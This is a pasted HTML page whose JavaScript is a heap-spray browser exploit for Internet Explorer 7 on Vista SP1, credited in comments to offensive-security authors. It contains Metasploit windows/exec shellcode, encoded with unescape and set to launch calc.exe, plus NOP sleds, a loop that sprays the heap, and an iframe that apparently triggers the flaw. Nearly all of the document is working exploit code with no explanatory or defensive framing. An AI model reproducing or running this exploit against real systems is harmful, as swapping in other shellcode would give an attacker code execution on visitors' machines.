Guest

Untitled

By: a guest on Jan 28th, 2012  |  syntax: None  |  size: 1.17 KB  |  hits: 22  |  expires: Never
download  |  raw  |  embed  |  report abuse
Copied
  1. <html>
  2. <script>
  3.  
  4.         // k`sOSe 12/10/2008 - tested on Vista SP1, Explorer 7.0.6001.18000
  5.   // Heap spray address adjusted for Vista - muts / offensive-security.com
  6.         // windows/exec - 141 bytes                                                                    
  7.         // http://www.metasploit.com                                                                    
  8.         // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe    
  9.         var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
  10.         var block = unescape("%u0a0a%u0a0a");
  11.         var nops = unescape("%u9090%u9090%u9090");
  12.  
  13.  
  14.         while (block.length < 81920) block += block;
  15.         var memory = new Array();
  16.         var i=0;
  17.         for (;i<1000;i++) memory[i] += (block + nops + shellcode);
  18.  
  19.         document.write("<iframe src=\"iframe.html\">");
  20.  
  21. </script>
  22.  
  23.  
  24. </html>